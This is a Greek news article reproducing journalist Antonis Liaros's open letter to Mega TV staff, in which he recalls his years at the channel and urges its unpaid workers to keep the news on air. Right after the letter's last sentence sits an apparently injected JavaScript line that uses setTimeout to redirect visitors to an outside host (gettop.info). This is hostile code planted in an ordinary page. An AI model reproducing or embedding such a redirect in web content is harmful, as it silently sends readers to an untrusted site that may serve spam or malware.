Αντώνης Λιάρος: Αδέλφια μου, κρατήστε το Μega ανοιχτό με κάθε κόστος

0
8

Ο Αντώνης Λιάρος συμμετείχε στην πρώτη ομάδα των δημοσιογράφων που έστησαν το Mega. Και έγραψε ένα πολύ κείμενο από ψυχής για το κανάλι που έζησε 23 ολόκληρα χρόνια. Διαβάστε το:

«Παρακολουθώ με πόνο ψυχής το δράμα των εργαζομένων στο Mega. Παρά το γεγονός ότι οι δρόμοι μας χώρισαν τον Απριλη του 2012, παρακολουθούσα και παρακολουθώ τον μικρόκοσμό τους απο κοντά. Χαιρόμουν για τις επιτυχίες τους και στενοχωριόμουν για τα ζόρια τους. Βλέπετε, 23 χρόνια ζήσαμε μαζι! Πανω απο 12 ωρες την ημερα, 6 μέρες τη βδομάδα! Ούτε με τα παιδιά μου δεν έζησα τόση ζωή… Γι συτό και τα κλάμματα, όταν αποφάσισα ν αλλάξω ρότα στην καριέρα μου. Ήταν στεναχώρια για έναν οδυνηρό… χωρισμό! Δεν ήταν εύκολο και μου έλλειπαν για καιρο… Οι χαρές οι λύπες, οι αγωνίες, να ειναι όλα στην ώρα τους. Οι live συνδέσεις, τα πλάνα, τα βίντεο, οι τίτλοι τα τα «παράθυρα». Μια διαρκής αγωνία, ένα κυνήγι με το χρόνο, ένα άγχος απίστευτο, αλλά τόσο δημιουργικό… Συντροφικότητα, καυγάδες, ένταση αλλά και … δέσιμο. Και ανακούφιση όταν έπεφτε το σήμα τέλους του μεσημεριανού δελτίου…

Όλα αυτά ήλθαν ξανά στη σκέψη μου όταν διάβασα το post της Μαρίας Σαράφογλου, για το «τελευταίο μεσημαριανό δελτιο του Mega». Το δελτίο που για πολλά χρόνια ήταν το σημείο αναφοράς για την μεσημεριανή ενημέρωση του τηλεοπτικού κοινού. Το σφίξιμο στο στομάχι ήταν σαν απο γροθι;a… Το τελευταίο μεσημεριανό δελτίο; Είναι δυνατόν;

Στο μυαλό μου πέρασαν όλα σαν βίντεο, απο αυτα τα βίντεο μαμούθ που εβγαζαν την ψυχη της Στέλλας, της Λιτσας, της Νατασας, της Ελενης… Ξανάκουσα τη φωνή της Άρσης και του Γιώργου στο ακουστικό μου… Θυμήθηκα τους καυγάδες μας για τους τίτλους… Ακόμα και τα τζαρτζαρίσματα με το Νίκο για την αξιολόγηση των ειδήσεων. Την αμέριστη εμπιστοσύνη του Χρήστου, που με απελευθέρωνε… Ολα αυτα ήταν που έκαναν τις μέρες ξεχωριστές, κουραστικές αλλά δημιουργικές ! Και γι αυτό δεν ξεχνιούνται ότι κι αν γίνει, όσα χρόνια κι αν περάσουν, όσες δουλειές κι αν αλλάξουμε!!!
Δεν ξεχνιούνται γιατί εκεί και με αυτους τους ανθρώπους έγινα καλύτερος. Έγινα αυτό που είμαι σήμερα!

Πρίν απο εβδομάδες, έγραφα εδώ στο fb, ότι δεν πίστευα πως θα κλείσει το Mega. Ήταν και είναι τόσο μεγάλος οργανισμός, με βαρύ όνομα, έμπειρο προσωπικό και μια ταινοθήκη μεγάλης αξιας. Δεν ήταν δυνατόν αυτή την επιχείρηση θα την εγκαταλείψουν οι μέτοχοί της, παρά τις διαφωνίες τους. Ήμουν αιθεροβάμων; Ίσως! Ήμουν επηρρεασμένος απο τις δύσκολες ώρες των φίλων μου; Μπορεί.
Αλλά τώρα, εδώ που φτάσαμε, νομίζω ότι πρέπει τα αδέλφια μου στο Mega να εκτιμήσουν όλα τα δεδομένα και να επανακαθορίσουν τη στάση τους. Το να καταγγέλεις τις τράπεζες γιατί δεν ανοίγουν τους λογαριασμούς του καναλιού και να πληρωθούν οι μισθοί έιναι μια κάποια αντίδραση, πλήν όμως καταδικασμένη. Με την τωρινή κατάσταση των τραπεζών και με τους κυβερνητικους βουλευτές να έχουν το χέρι στη σκανδάλη για το διαπλεκόμενο Mega, δεν υπάρχει περίπτωση να ανοίξουν λογαριασμοί, όσο δεν υλοποιείται η απόφαση των μετόχων για αύξηση του μετοχικού κεφαλαίου. Οσο υπάρχει ο κίνδυνος πτώχευσης της επιχείρησης και συνεπώς απώλειας των δανείων που εχουν χορηγηθει. Η κατηγορία θα είναι απιστία και ειναι κακούργημα. Και κακα τα ψέμματα, αν οι μέτοχοι δε βαλουν χρημα, η επιχείρηση θα πτωχεύσει.

Γι αυτό, εγώ στη θέση των αγαπητών μου συναδέλφων θα έκανα κάτι άλλο… Θα κρατούσα το Μega ανοιχτό, με κάθε κόστος. Για να υπάρχει μια φωνή δυνατή. . Όσο πιο πολλοί συζητούν το πρόβλημα του καναλιού, τόσο πιο ισχυρή θα ειναι η πίεση σε κυβέρνηση και μετόχους. Αν σταματήσουν τα δελτία ειδήσεων, κανείς δεν θα ασχοληθεί και δε θα λυπηθεί αν πέσει «μαύρο» σε ένα κανάλι χωρις ΦΩΝΗ!

Φανταστείτε πόσο διαφορετικό θα ήταν το λουκέτο στην ΕΡΤ αν δεν ήταν η Έλλη Στάη στον αέρα; Φανταστείτε να είναι οι δημοσιογράφοι στον αέρα όταν για οποιδήποτε λόγο και απο οποιουδήποτε πρωτοβουλια πέσει «μαύρο». Σας βεβαιώνω, το κόστος για όποιον το κάνει θα είναι τεράστιο και δυσβάσταχτο.

Το ξέρω πως όταν είσαι απλήρωτος και δεν εχεις να ταίσεις την οικογένειά σου ειναι δυσκολο να εργαστείς. Μου έχει συμβεί κι εμένα. Αλλά η δημοσιοποίηση του προβλήματος είναι το ΜΟΝΟ όπλο των εργαζομένων, για να έχει ο τίτλος του Mega αξία και να ελπίζει κανείς ότι θα παρει τα χρήματά του, είτε απο την πώληση της εταιρείας , είτε απο την επαναλειτουργία της

Αν σβήσει η φωνή των δημοσιογράφων, θα ξεχαστεί το πρόβλημα…Και κάποιοι (και είναι πολλοί) θα χαρούν πολύ. Μην τους κάνετε τη χάρη»! setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here